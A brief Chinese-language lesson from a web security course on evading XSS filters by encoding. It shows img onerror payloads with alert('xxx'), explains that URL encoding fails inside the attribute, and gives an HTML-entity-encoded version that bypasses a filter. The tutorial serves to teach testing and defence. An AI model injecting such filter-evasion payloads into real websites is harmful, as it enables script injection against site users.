风炫安全WEB安全学习第二十六节课 XSS常见绕过防御技巧

风炫安全WEB安全学习第二十六节课 XSS常见绕过防御技巧

XSS绕过-过滤-编码

核心思想

后台过滤了特殊字符，比如说<script>标签，但该标签可以被各种编码，后台不一定过滤，当浏览器对该编码进行识别的时候，会翻译成正常的标签，从而被执行。

<img src=x onerror="alert('xxx')" 将alert('xxx')进行url编码

<img src=x onerror="alert(%27xxx%27)" />

这样并不会执行，因为这些属性标签并不会正常解析这些编码

使用html实体编码则可以

<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x78;&#x78;&#x27;&#x29;">

参考：
http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第二十六节课-xss常见绕过防御技/